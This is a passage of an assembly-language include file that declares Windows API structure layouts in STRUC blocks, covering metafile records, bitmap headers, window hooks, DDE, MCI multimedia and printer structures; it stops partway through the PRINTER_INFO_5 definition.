STRUC EMRPLOYBEZIERTO16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRPOLYLINETO16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRPOLYDRAW
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cptl RESD 1
.aptl1 RESD 1
.abTypes1 RESW 1
ENDSTRUC
STRUC EMRPOLYDRAW16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cpts RESD 1
.apts RESD 1
.abTypes RESW 1
ENDSTRUC
STRUC EMRPOLYPOLYLINE
.emr RESB EMR_size
.rclBounds RESB RECT_size
.nPolys RESD 1
.cptl RESD 1
.aPolyCounts RESD 1
.aptl RESD 1
ENDSTRUC
STRUC EMRPOLYPOLYGON
.emr RESB EMR_size
.rclBounds RESB RECT_size
.nPolys RESD 1
.cptl RESD 1
.aPolyCounts RESD 1
.aptl1 RESD 1
ENDSTRUC
STRUC EMRPOLYPOLYLINE16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.nPolys RESD 1
.cpts RESD 1
.aPolyCounts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRPOLYPOLYGON16
.emr RESB EMR_size
.rclBounds RESB RECT_size
.nPolys RESD 1
.cpts RESD 1
.aPolyCounts RESD 1
.apts1 RESD 1
ENDSTRUC
STRUC EMRINVERTRGN
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cbRgnData RESD 1
.RgnData1 RESW 1
ENDSTRUC
STRUC EMRPAINTRGN
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cbRgnData RESD 1
.RgnData1 RESW 1
ENDSTRUC
STRUC EMRFILLRGN
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cbRgnData RESD 1
.ihBrush RESD 1
.RgnData RESW 1
ENDSTRUC
STRUC EMRFRAMERGN
.emr RESB EMR_size
.rclBounds RESB RECT_size
.cbRgnData RESD 1
.ihBrush RESD 1
.szlStroke RESD 1
.RgnData1 RESW 1
ENDSTRUC
STRUC EMREXTSELECTCLIPRGN
.emr RESB EMR_size
.cbRgnData RESD 1
.iMode RESD 1
.RgnData RESW 1
ENDSTRUC
STRUC EMREXTTEXTOUT
.emr RESB EMR_size
.rclBounds RESB RECT_size
.iGraphicsMode RESD 1
.exScale RESQ 1
.eyScale RESQ 1
.emrtext RESD 1
ENDSTRUC
STRUC EMRBITBLT
.emr RESB EMR_size
.rclBounds RESB RECT_size
.xDest RESD 1
.yDest RESD 1
.cxDest RESD 1
.cyDest RESD 1
.dwRop RESD 1
.xSrc RESD 1
.ySrc RESD 1
.xformSrc RESD 1
.crBkColorSrc RESD 1
.iUsageSrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
ENDSTRUC
STRUC EMRSTRETCHBLT
.emr RESB EMR_size
.rclBounds RESB RECT_size
.xDest RESD 1
.yDest RESD 1
.cxDest RESD 1
.cyDest RESD 1
.dwRop RESD 1
.xSrc RESD 1
.ySrc RESD 1
.xformSrc RESD 1
.crBkColorSrc RESD 1
.iUsageSrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
.cxSrc RESD 1
.cySrc RESD 1
ENDSTRUC
STRUC EMRMASKBLT
.emr RESB EMR_size
.rclBounds RESB RECT_size
.xDest RESD 1
.yDest RESD 1
.cxDest RESD 1
.cyDest RESD 1
.dwRop RESD 1
.xSrc2 RESD 1
.cyDest2 RESD 1
.dwRop2 RESD 1
.xSrc RESD 1
.ySrc RESD 1
.xformSrc RESD 1
.crBkColorSrc RESD 1
.iUsageSrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
.xMask RESD 1
.yMask RESD 1
.iUsageMask RESD 1
.offBmiMask RESD 1
.cbBmiMask RESD 1
.offBitsMask RESD 1
.cbBitsMask RESD 1
ENDSTRUC
STRUC EMRPLGBLT
.emr RESB EMR_size
.rclBounds RESB RECT_size
.aptlDest3 RESD 1
.xSrc RESD 1
.ySrc RESD 1
.cxSrc RESD 1
.cySrc RESD 1
.xformSrc RESD 1
.crBkColorSrc RESD 1
.iUsageSrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
.xMask RESD 1
.yMask RESD 1
.iUsageMask RESD 1
.offBmiMask RESD 1
.cbBmiMask RESD 1
.offBitsMask RESD 1
.cbBitsMask RESD 1
ENDSTRUC
STRUC EMRSETDIBITSTODEVICE
.emr RESB EMR_size
.rclBounds RESB RECT_size
.xDest RESD 1
.yDest RESD 1
.xSrc RESD 1
.ySrc RESD 1
.cxSrc RESD 1
.cySrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
.iUsageSrc RESD 1
.iStartScan RESD 1
.cScans RESD 1
ENDSTRUC
STRUC EMRSTRETCHDIBITS
.emr RESB EMR_size
.rclBounds RESB RECT_size
.xDest RESD 1
.yDest RESD 1
.xSrc RESD 1
.ySrc RESD 1
.cxSrc RESD 1
.cySrc RESD 1
.offBmiSrc RESD 1
.cbBmiSrc RESD 1
.offBitsSrc RESD 1
.cbBitsSrc RESD 1
.iUsageSrc RESD 1
.dwRop RESD 1
.cxDest RESD 1
.cyDest RESD 1
ENDSTRUC
STRUC EMREXTCREATEFONTINDIRECT
.emr RESB EMR_size
.ihFont RESD 1
.elfw RESD 1
ENDSTRUC
STRUC EMRCREATEPALETTE
.emr RESB EMR_size
.ihPal RESD 1
.lgpl RESD 1
ENDSTRUC
STRUC EMRCREATEPEN
.emr RESB EMR_size
.ihPen RESD 1
.lopn RESD 1
ENDSTRUC
STRUC EMREXTCREATEPEN
.emr RESB EMR_size
.ihPen RESD 1
.offBmi RESD 1
.cbBmi RESD 1
.offBits RESD 1
.cbBits RESD 1
.elp RESD 1
ENDSTRUC
STRUC EMRCREATEBRUSHINDIRECT
.emr RESB EMR_size
.ihBrush RESD 1
.lb RESD 1
ENDSTRUC
STRUC EMRCREATEMONOBRUSH
.emr RESB EMR_size
.ihBrush RESD 1
.iUsage RESD 1
.offBmi RESD 1
.cbBmi RESD 1
.offBits RESD 1
.cbBits RESD 1
ENDSTRUC
STRUC EMRCREATEDIBPATTERNBRUSHPT
.emr RESB EMR_size
.ihBursh RESD 1
.iUsage RESD 1
.offBmi RESD 1
.cbBmi RESD 1
.offBits RESD 1
.cbBits RESD 1
ENDSTRUC
STRUC BITMAPV4HEADER
.bV4Size RESD 1
.bV4Width RESD 1
.bV4Height RESD 1
.bV4Planes RESW 1
.bV4BitCount RESW 1
.bV4V4Compression RESD 1
.bV4SizeImage RESD 1
.bV4XPelsPerMeter RESD 1
.bV4YPelsPerMeter RESD 1
.bV4ClrUsed RESD 1
.bV4ClrImportant RESD 1
.bV4RedMask RESD 1
.bV4GreenMask RESD 1
.bV4BlueMask RESD 1
.bV4AlphaMask RESD 1
.bV4CSType RESD 1
.bV4Endpoints RESD 1
.bV4GammaRed RESD 1
.bV4GammaGreen RESD 1
.bV4GammaBlue RESD 1
ENDSTRUC
STRUC FONTSIGNATURE
.fsUsb4 RESD 1
.fsCsb2 RESD 1
ENDSTRUC
STRUC CHARSETINFO
.ciCharset RESD 1
.ciACP RESD 1
.xlfs RESD 1
ENDSTRUC
STRUC LOCALESIGNATURE
.lsUsb4 RESD 1
.lsCsbDefault RESD 1
.lsCsbSupported RESD 1
ENDSTRUC
STRUC NEWTEXTMETRICEX
.ntmTm RESD 1
.ntmFontSig RESD 1
ENDSTRUC
STRUC ENUMLOGFONTEX
.elfLogFont RESD 1
.elfFullName RESB 1
.elfStyle RESB 1
.elfScript RESB 1
ENDSTRUC
STRUC GCP_RESULTS
.lStructSize RESD 1
.lpOutString RESD 1
.lpOrder RESD 1
.lpDX RESD 1
.lpCaretPos RESD 1
.lpClass RESD 1
.lpGlyphs RESD 1
.nGlyphs RESD 1
.nMaxFit RESD 1
ENDSTRUC
STRUC CIEXYZ
.ciexyzX RESD 1
.ciexyzY RESD 1
.ciexyzZ RESD 1
ENDSTRUC
STRUC CIEXYZTRIPLE
.ciexyzRed RESD 1
.ciexyzGreen RESD 1
.ciexyBlue RESD 1
ENDSTRUC
STRUC LOGCOLORSPACE
.lcsSignature RESD 1
.lcsVersion RESD 1
.lcsSize RESD 1
.lcsCSType RESD 1
.lcsIntent RESD 1
.lcsEndPoints RESD 1
.lcsGammaRed RESD 1
.lcsGammaGreen RESD 1
.lcsGammaBlue RESD 1
.lcsFileName RESB MAX_PATH
ENDSTRUC
STRUC EMRSELECTCOLORSPACE
.emr RESB EMR_size
.ihCS RESD 1
ENDSTRUC
STRUC EMRCREATECOLORSPACE
.emr RESB EMR_size
.ihCS RESD 1
.lcs RESD 1
ENDSTRUC
STRUC CBTACTIVATESTRUCT
.fMouse RESD 1
.hWndActive RESD 1
ENDSTRUC
STRUC EVENTMSG
.message RESD 1
.paramL RESD 1
.paramH RESD 1
.time RESD 1
.hwnd RESD 1
ENDSTRUC
STRUC CWPSTRUCT
.lParam RESD 1
.wParam RESD 1
.message RESD 1
.hwnd RESD 1
ENDSTRUC
STRUC DEBUGHOOKINFO
.hModuleHook RESD 1
.Reserved RESD 1
.lParam RESD 1
.wParam RESD 1
.code RESD 1
ENDSTRUC
STRUC MOUSEHOOKSTRUCT
.pt RESB POINT_size
.hwnd RESD 1
.wHitTestCode RESD 1
.dwExtraInfo RESD 1
ENDSTRUC
STRUC MINMAXINFO
.ptReserved RESB POINT_size
.ptMaxSize RESB POINT_size
.ptMaxPosition RESB POINT_size
.ptMinTrackSize RESB POINT_size
.ptMaxTrackSize RESB POINT_size
ENDSTRUC
STRUC COPYDATASTRUCT
.dwData RESD 1
.cbData RESD 1
.lpData RESD 1
ENDSTRUC
STRUC WINDOWPOS
.hwnd RESD 1
.hWndInsertAfter RESD 1
.x RESD 1
.y RESD 1
.lx RESD 1
.ly RESD 1
.flags RESD 1
ENDSTRUC
STRUC ACCEL
.fVirt RESB 1
.key RESW 1
.cmd RESW 1
ENDSTRUC
STRUC PAINTSTRUCT
.hdc RESD 1
.fErase RESD 1
.rcPaint RESB RECT_size
.fRestore RESD 1
.fIncUpdate RESD 1
.rgbReserved RESB 32
ENDSTRUC
STRUC CREATESTRUCT
.lpCreateParams RESD 1
.hInstance RESD 1
.hMenu RESD 1
.hWndParent RESD 1
.ly RESD 1
.lx RESD 1
.y RESD 1
.x RESD 1
.style RESD 1
.lpszName RESD 1
.lpszClass RESD 1
.ExStyle RESD 1
ENDSTRUC
STRUC CBT_CREATEWND
.lpcs RESD 1
.hWndInsertAfter RESD 1
ENDSTRUC
STRUC WINDOWPLACEMENT
.iLength RESD 1
.flags RESD 1
.showCmd RESD 1
.ptMinPosition RESB POINT_size
.ptMaxPosition RESB POINT_size
.rcNormalPosition RESB RECT_size
ENDSTRUC
STRUC MEASUREITEMSTRUCT
.CtlType RESD 1
.CtlID RESD 1
.itemID RESD 1
.itemWidth RESD 1
.itemHeight RESD 1
.itemData RESD 1
ENDSTRUC
STRUC DRAWITEMSTRUCT
.CtlType RESD 1
.CtlID RESD 1
.itemID RESD 1
.itemAction RESD 1
.itemState RESD 1
.hwndItem RESD 1
.hDC RESD 1
.rcItem RESB RECT_size
.itemData RESD 1
ENDSTRUC
STRUC DELETEITEMSTRUCT
.CtlType RESD 1
.CtlID RESD 1
.itemID RESD 1
.hwndItem RESD 1
.itemData RESD 1
ENDSTRUC
STRUC COMPAREITEMSTRUCT
.CtlType RESD 1
.CtlID RESD 1
.hwndItem RESD 1
.itemID1 RESD 1
.itemData1 RESD 1
.itemID2 RESD 1
.itemData2 RESD 1
ENDSTRUC
STRUC DLGTEMPLATE
.style RESD 1
.dwExtendedStyle RESD 1
.cdit RESW 1
.x RESW 1
.y RESW 1
.lx RESW 1
.ly RESW 1
ENDSTRUC
STRUC DLGITEMTEMPLATE
.style RESD 1
.dwExtendedStyle RESD 1
.x RESW 1
.y RESW 1
.lx RESW 1
.ly RESW 1
.id RESW 1
ENDSTRUC
STRUC MENUITEMTEMPLATEHEADER
.versionNumber RESW 1
.loffset RESW 1
ENDSTRUC
STRUC MENUITEMTEMPLATE
.mtOption RESW 1
.mtID RESW 1
.mtString RESB 1
ENDSTRUC
STRUC ICONINFO
.fIcon RESD 1
.xHotspot RESD 1
.yHotspot RESD 1
.hbmMask RESD 1
.hbmColor RESD 1
ENDSTRUC
STRUC MDICREATESTRUCT
.szClass RESD 1
.szTitle RESD 1
.hOwner RESD 1
.x RESD 1
.y RESD 1
.lx RESD 1
.ly RESD 1
.style RESD 1
.lParam RESD 1
ENDSTRUC
STRUC CLIENTCREATESTRUCT
.hWindowMenu RESD 1
.idFirstChild RESD 1
ENDSTRUC
STRUC MULTIKEYHELP
.mkSize RESD 1
.mkKeylist RESB 1
.szKeyphrase RESB 253
ENDSTRUC
STRUC HELPWININFO
.wStructSize RESD 1
.x RESD 1
.y RESD 1
.lx RESD 1
.ly RESD 1
.wMax RESD 1
.rgchMember RESB 2
ENDSTRUC
STRUC DDEACK
.bAppReturnCode RESW 1
.Reserved RESW 1
.fbusy RESW 1
.fack RESW 1
ENDSTRUC
STRUC DDEADVISE
.Reserved RESW 1
.fDeferUpd RESW 1
.fAckReq RESW 1
.cfFormat RESW 1
ENDSTRUC
STRUC DDEDATA
.unused RESW 1
.fresponse RESW 1
.fRelease RESW 1
.Reserved RESW 1
.fAckReq RESW 1
.cfFormat RESW 1
.Value1 RESB 1
ENDSTRUC
STRUC DDEPOKE
.unused RESW 1
.fRelease RESW 1
.fReserved RESW 1
.cfFormat RESW 1
.Value1 RESB 1
ENDSTRUC
STRUC DDELN
.unused RESW 1
.fRelease RESW 1
.fDeferUpd RESW 1
.fAckReq RESW 1
.cfFormat RESW 1
ENDSTRUC
STRUC DDEUP
.unused RESW 1
.fAck RESW 1
.fRelease RESW 1
.fReserved RESW 1
.fAckReq RESW 1
.cfFormat RESW 1
.xRGB1 RESB 1
ENDSTRUC
STRUC HSZPAIR
.hszSvc RESD 1
.hszTopic RESD 1
ENDSTRUC
STRUC SECURITY_QUALITY_OF_SERVICE
.iLength RESD 1
.Impersonationlevel RESW 1
.ContextTrackingMode RESW 1
.EffectiveOnly RESD 1
ENDSTRUC
STRUC CONVCONTEXT
.cb RESD 1
.wFlags RESD 1
.wCountryID RESD 1
.iCodePage RESD 1
.dwLangID RESD 1
.dwSecurity RESD 1
.qos RESD 1
ENDSTRUC
STRUC CONVINFO
.cb RESD 1
.hUser RESD 1
.hConvPartner RESD 1
.hszSvcPartner RESD 1
.hszServiceReq RESD 1
.hszTopic RESD 1
.hszItem RESD 1
.wFmt RESD 1
.wType RESD 1
.wStatus RESD 1
.wConvst RESD 1
.wLastError RESD 1
.hConvList RESD 1
.ConvCtxt RESD 1
.hwnd RESD 1
.hwndPartner RESD 1
ENDSTRUC
STRUC DDEML_MSG_HOOK_DATA
.uiLo RESD 1
.uiHi RESD 1
.cbData RESD 1
.xData RESD 1
ENDSTRUC
STRUC MONMSGSTRUCT
.cb RESD 1
.hwndTo RESD 1
.dwTime RESD 1
.htask RESD 1
.wMsg RESD 1
.wParam RESD 1
.lParam RESD 1
.dmhd RESD 1
ENDSTRUC
STRUC MONCBSTRUCT
.cb RESD 1
.dwTime RESD 1
.htask RESD 1
.dwRet RESD 1
.wType RESD 1
.wFmt RESD 1
.hConv RESD 1
.hsz1 RESD 1
.hsz2 RESD 1
.hData RESD 1
.dwData1 RESD 1
.dwData2 RESD 1
.cc RESD 1
.cbData RESD 1
.xData8 RESD 1
ENDSTRUC
STRUC MONHSZSTRUCT
.cb RESD 1
.fsAction RESD 1
.dwTime RESD 1
.hsz RESD 1
.htask RESD 1
.xstr RESB 1
ENDSTRUC
STRUC MONERRSTRUCT
.cb RESD 1
.wLastError RESD 1
.dwTime RESD 1
.htask RESD 1
ENDSTRUC
STRUC MONLINKSTRUCT
.cb RESD 1
.dwTime RESD 1
.htask RESD 1
.fEstablished RESD 1
.fNoData RESD 1
.hszSvc RESD 1
.hszTopic RESD 1
.hszItem RESD 1
.wFmt RESD 1
.fServer RESD 1
.hConvServer RESD 1
.hConvClient RESD 1
ENDSTRUC
STRUC MONCONVSTRUCT
.cb RESD 1
.fConnect RESD 1
.dwTime RESD 1
.htask RESD 1
.hszSvc RESD 1
.hszTopic RESD 1
.hConvClient RESD 1
.hConvServer RESD 1
ENDSTRUC
STRUC smpte
.hour RESB 1
.minute RESB 1
.sec RESB 1
.frame RESB 1
.fps RESB 1
.dummy RESB 1
.pad RESB 1
ENDSTRUC
STRUC midi
.songptrpos RESD 1
ENDSTRUC
STRUC MMTIME
.wType RESD 1
.u RESD 1
ENDSTRUC
STRUC MIDIEVENT
.dwDeltaTime RESD 1
.dwStreamID RESD 1
.dwEvent RESD 1
.dwParms RESD 1
ENDSTRUC
STRUC MIDISTRMBUFFVER
.dwVersion RESD 1
.dwMid RESD 1
.dwOEMVersion RESD 1
ENDSTRUC
STRUC MIDIPROPTIMEDIV
.cbStruct RESD 1
.dwTimeDiv RESD 1
ENDSTRUC
STRUC MIDIPROPTEMPO
.cbStruct RESD 1
.dwTempo RESD 1
ENDSTRUC
STRUC MIXERCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
.fdwSupport RESD 1
.cDestinations RESD 1
ENDSTRUC
STRUC Target
.dwType RESD 1
.dwDeviceID RESD 1
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
ENDSTRUC
STRUC MIXERLINECONTROLS
.cbStruct RESD 1
.dwLineID RESD 1
.dwControl RESD 1
.cControls RESD 1
.cbmxctrl RESD 1
.pamxctrl RESD 1
ENDSTRUC
STRUC MIXERCONTROLDETAILS
.cbStruct RESD 1
.dwControlID RESD 1
.cChannels RESD 1
.item RESD 1
.cbDetails RESD 1
.paDetails RESD 1
ENDSTRUC
STRUC MIXERCONTROLDETAILS_BOOLEAN
.fValue RESD 1
ENDSTRUC
STRUC MIXERCONTROLDETAILS_SIGNED
.lValue RESD 1
ENDSTRUC
STRUC MIXERCONTROLDETAILS_UNSIGNED
.dwValue RESD 1
ENDSTRUC
STRUC JOYINFOEX
.dwSize RESD 1
.dwFlags RESD 1
.dwXpos RESD 1
.dwYpos RESD 1
.dwZpos RESD 1
.dwRpos RESD 1
.dwUpos RESD 1
.dwVpos RESD 1
.dwButtons RESD 1
.dwButtonNumber RESD 1
.dwPOV RESD 1
.dwReserved1 RESD 1
.dwReserved2 RESD 1
ENDSTRUC
STRUC DRVCONFIGINFO
.dwDCISize RESD 1
.lpszDCISectionName RESD 1
.lpszDCIAliasName RESD 1
.dnDevNode RESD 1
ENDSTRUC
STRUC WAVEHDR
.lpData RESD 1
.dwBufferiLength RESD 1
.dwBytesRecorded RESD 1
.dwUser RESD 1
.dwFlags RESD 1
.dwLoops RESD 1
.lpNext RESD 1
.Reserved RESD 1
ENDSTRUC
STRUC WAVEOUTCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
.dwFormats RESD 1
.wChannels RESW 1
.dwSupport RESD 1
ENDSTRUC
STRUC WAVEINCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
.dwFormats RESD 1
.wChannels RESW 1
ENDSTRUC
STRUC WAVEFORMAT
.wFormatTag RESW 1
.nChannels RESW 1
.nSamplesPerSec RESD 1
.nAvgBytesPerSec RESD 1
.nBlockAlign RESW 1
ENDSTRUC
STRUC PCMWAVEFORMAT
.wf RESD 1
.wBitsPerSample RESW 1
ENDSTRUC
STRUC MIDIOUTCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
.wTechnology RESW 1
.wVoices RESW 1
.wNotes RESW 1
.wChannelMask RESW 1
.dwSupport RESD 1
ENDSTRUC
STRUC MIDIINCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
ENDSTRUC
STRUC MIDIHDR
.lpData RESD 1
.dwBufferiLength RESD 1
.dwBytesRecorded RESD 1
.dwUser RESD 1
.dwFlags RESD 1
.lpNext RESD 1
.Reserved RESD 1
ENDSTRUC
STRUC AUXCAPS
.wMid RESW 1
.wPid RESW 1
.vDriverVersion RESD 1
.szPname RESB MAXPNAMELEN
.wTechnology RESW 1
.dwSupport RESD 1
ENDSTRUC
STRUC TIMECAPS
.wPeriodMin RESD 1
.wPeriodMax RESD 1
ENDSTRUC
STRUC JOYCAPS
.wMid RESW 1
.wPid RESW 1
.szPname RESB MAXPNAMELEN
.wXmin RESW 1
.wXmax RESW 1
.wYmin RESW 1
.wYmax RESW 1
.wZmin RESW 1
.wZmax RESW 1
.wNumButtons RESW 1
.wPeriodMin RESW 1
.wPeriodMax RESW 1
ENDSTRUC
STRUC JOYINFO
.wXpos RESW 1
.wYpos RESW 1
.wZpos RESW 1
.wButtons RESW 1
ENDSTRUC
STRUC MMIOINFO
.dwFlags RESD 1
.fccIOProc RESD 1
.pIOProc RESD 1
.wErrorRet RESD 1
.htask RESD 1
.cchBuffer RESD 1
.pchBuffer RESD 1
.pchNext RESD 1
.pchEndRead RESD 1
.pchEndWrite RESD 1
.lBufOffset RESD 1
.lDiskOffset RESD 1
.adwInfo4 RESD 1
.dwReserved1 RESD 1
.dwReserved2 RESD 1
.hmmio RESD 1
ENDSTRUC
STRUC MMCKINFO
.ckid RESD 1
.ckSize RESD 1
.fccType RESD 1
.dwDataOffset RESD 1
.dwFlags RESD 1
ENDSTRUC
STRUC MCI_GENERIC_PARMS
.dwCallback RESD 1
ENDSTRUC
STRUC MCI_OPEN_PARMS
.dwCallback RESD 1
.wDeviceID RESD 1
.lpstrDeviceType RESD 1
.lpstrElementName RESD 1
.lpstrAlias RESD 1
ENDSTRUC
STRUC MCI_PLAY_PARMS
.dwCallback RESD 1
.dwFrom RESD 1
.dwTo RESD 1
ENDSTRUC
STRUC MCI_SEEK_PARMS
.dwCallback RESD 1
.dwTo RESD 1
ENDSTRUC
STRUC MCI_STATUS_PARMS
.dwCallback RESD 1
.dwReturn RESD 1
.dwItem RESD 1
.dwTrack RESW 1
ENDSTRUC
STRUC MCI_INFO_PARMS
.dwCallback RESD 1
.lpstrReturn RESD 1
.dwRetSize RESD 1
ENDSTRUC
STRUC MCI_GETDEVCAPS_PARMS
.dwCallback RESD 1
.dwReturn RESD 1
.dwIten RESD 1
ENDSTRUC
STRUC MCI_SYSINFO_PARMS
.dwCallback RESD 1
.lpstrReturn RESD 1
.dwRetSize RESD 1
.dwNumber RESD 1
.wDeviceType RESD 1
ENDSTRUC
STRUC MCI_SET_PARMS
.dwCallback RESD 1
.dwTimeFormat RESD 1
.dwAudio RESD 1
ENDSTRUC
STRUC MCI_BREAK_PARMS
.dwCallback RESD 1
.nVirtKey RESD 1
.hwndBreak RESD 1
ENDSTRUC
STRUC MCI_SOUND_PARMS
.dwCallback RESD 1
.lpstrSoundName RESD 1
ENDSTRUC
STRUC MCI_SAVE_PARMS
.dwCallback RESD 1
.lpFileName RESD 1
ENDSTRUC
STRUC MCI_LOAD_PARMS
.dwCallback RESD 1
.lpFileName RESD 1
ENDSTRUC
STRUC MCI_RECORD_PARMS
.dwCallback RESD 1
.dwFrom RESD 1
.dwTo RESD 1
ENDSTRUC
STRUC MCI_VD_PLAY_PARMS
.dwCallback RESD 1
.dwFrom RESD 1
.dwTo RESD 1
.dwSpeed RESD 1
ENDSTRUC
STRUC MCI_VD_STEP_PARMS
.dwCallback RESD 1
.dwFrames RESD 1
ENDSTRUC
STRUC MCI_VD_ESCAPE_PARMS
.dwCallback RESD 1
.lpstrCommand RESD 1
ENDSTRUC
STRUC MCI_WAVE_OPEN_PARMS
.dwCallback RESD 1
.wDeviceID RESD 1
.lpstrDeviceType RESD 1
.lpstrElementName RESD 1
.lpstrAlias RESD 1
.dwBufferSeconds RESD 1
ENDSTRUC
STRUC MCI_WAVE_DELETE_PARMS
.dwCallback RESD 1
.dwFrom RESD 1
.dwTo RESD 1
ENDSTRUC
STRUC MCI_WAVE_SET_PARMS
.dwCallback RESD 1
.dwTimeFormat RESD 1
.dwAudio RESD 1
.wInput RESD 1
.wOutput RESD 1
.wFormatTag RESW 1
.wReserved2 RESW 1
.nChannels RESW 1
.wReserved3 RESW 1
.nSamplesPerSec RESD 1
.nAvgBytesPerSec RESD 1
.nBlockAlign RESW 1
.wReserved4 RESW 1
.wBitsPerSample RESW 1
.wReserved5 RESW 1
ENDSTRUC
STRUC MCI_SEQ_SET_PARMS
.dwCallback RESD 1
.dwTimeFormat RESD 1
.dwAudio RESD 1
.dwTempo RESD 1
.dwPort RESD 1
.dwSlave RESD 1
.dwMaster RESD 1
.dwOffset RESD 1
ENDSTRUC
STRUC MCI_ANIM_OPEN_PARMS
.dwCallback RESD 1
.wDeviceID RESD 1
.lpstrDeviceType RESD 1
.lpstrElementName RESD 1
.lpstrAlias RESD 1
.dwStyle RESD 1
.hWndParent RESD 1
ENDSTRUC
STRUC MCI_ANIM_PLAY_PARMS
.dwCallback RESD 1
.dwFrom RESD 1
.dwTo RESD 1
.dwSpeed RESD 1
ENDSTRUC
STRUC MCI_ANIM_STEP_PARMS
.dwCallback RESD 1
.dwFrames RESD 1
ENDSTRUC
STRUC MCI_ANIM_WINDOW_PARMS
.dwCallback RESD 1
.hwnd RESD 1
.nCmdShow RESD 1
.lpstrText RESD 1
ENDSTRUC
STRUC MCI_ANIM_RECT_PARMS
.dwCallback RESD 1
.rc RESB RECT_size
ENDSTRUC
STRUC MCI_ANIM_UPDATE_PARMS
.dwCallback RESD 1
.rc RESB RECT_size
.hDC RESD 1
ENDSTRUC
STRUC MCI_OVLY_OPEN_PARMS
.dwCallback RESD 1
.wDeviceID RESD 1
.lpstrDeviceType RESD 1
.lpstrElementName RESD 1
.lpstrAlias RESD 1
.dwStyle RESD 1
.hWndParent RESD 1
ENDSTRUC
STRUC MCI_OVLY_WINDOW_PARMS
.dwCallback RESD 1
.hwnd RESD 1
.nCmdShow RESD 1
.lpstrText RESD 1
ENDSTRUC
STRUC MCI_OVLY_RECT_PARMS
.dwCallback RESD 1
.rc RESB RECT_size
ENDSTRUC
STRUC MCI_OVLY_SAVE_PARMS
.dwCallback RESD 1
.lpFileName RESD 1
.rc RESB RECT_size
ENDSTRUC
STRUC MCI_OVLY_LOAD_PARMS
.dwCallback RESD 1
.lpFileName RESD 1
.rc RESB RECT_size
ENDSTRUC
STRUC PRINTER_INFO_1
.flags RESD 1
.pDescription RESD 1
.pName RESD 1
.pComment RESD 1
ENDSTRUC
STRUC PRINTER_INFO_2
.pServerName RESD 1
.pPrinterName RESD 1
.pShareName RESD 1
.pPortName RESD 1
.pDriverName RESD 1
.pComment RESD 1
.pLocation RESD 1
.pDevMode RESD 1
.pSepFile RESD 1
.pPrintProcessor RESD 1
.pDatatype RESD 1
.pParameters RESD 1
.pSecurityDescriptor RESD 1
.Attributes RESD 1
.Priority RESD 1
.DefaultPriority RESD 1
.StartTime RESD 1
.UntilTime RESD 1
.Status RESD 1
.cJobs RESD 1
.AveragePPM RESD 1
ENDSTRUC
STRUC PRINTER_INFO_3
.pSecurityDescriptor RESD 1
ENDSTRUC
STRUC JOB_INFO_1
.JobId RESD 1
.pPrinterName RESD 1
.pMachineName RESD 1
.pUserName RESD 1
.pDocument RESD 1
.pDatatype RESD 1
.pStatus RESD 1
.Status RESD 1
.Priority RESD 1
.Position RESD 1
.TotalPages RESD 1
.PagesPrinted RESD 1
.Submitted RESD 1
ENDSTRUC
STRUC JOB_INFO_2
.JobId RESD 1
.pPrinterName RESD 1
.pMachineName RESD 1
.pUserName RESD 1
.pDocument RESD 1
.pNotifyName RESD 1
.pDatatype RESD 1
.pPrintProcessor RESD 1
.pParameters RESD 1
.pDriverName RESD 1
.pDevMode RESD 1
.pStatus RESD 1
.pSecurityDescriptor RESD 1
.Status RESD 1
.Priority RESD 1
.Position RESD 1
.StartTime RESD 1
.UntilTime RESD 1
.TotalPages RESD 1
.isize RESD 1
.Submitted RESD 1
.time RESD 1
.PagesPrinted RESD 1
ENDSTRUC
STRUC ADDJOB_INFO_1
.Path RESD 1
.JobId RESD 1
ENDSTRUC
STRUC DRIVER_INFO_1
.pName RESD 1
ENDSTRUC
STRUC DRIVER_INFO_2
.cVersion RESD 1
.pName RESD 1
.pEnvironment RESD 1
.pDriverPath RESD 1
.pDataFile RESD 1
.pConfigFile RESD 1
ENDSTRUC
STRUC DOC_INFO_1
.pDocName RESD 1
.pOutputFile RESD 1
.pDatatype RESD 1
ENDSTRUC
STRUC FORM_INFO_1
.pName RESD 1
.isize RESD 1
.ImageableArea RESD 1
ENDSTRUC
STRUC PRINTPROCESSOR_INFO_1
.pName RESD 1
ENDSTRUC
STRUC PORT_INFO_1
.pName RESD 1
ENDSTRUC
STRUC MONITOR_INFO_1
.pName RESD 1
ENDSTRUC
STRUC MONITOR_INFO_2
.pName RESD 1
.pEnvironment RESD 1
.pDLLName RESD 1
ENDSTRUC
STRUC DATATYPES_INFO_1
.pName RESD 1
ENDSTRUC
STRUC PRINTER_DEFAULTS
.pDatatype RESD 1
.pDevMode RESD 1
.DesiredAccess RESD 1
ENDSTRUC
STRUC PRINTER_INFO_4
.pPrinterName RESD 1
.pServerName RESD 1
.Attributes RESD 1
ENDSTRUC
STRUC PRINTER_INFO_5
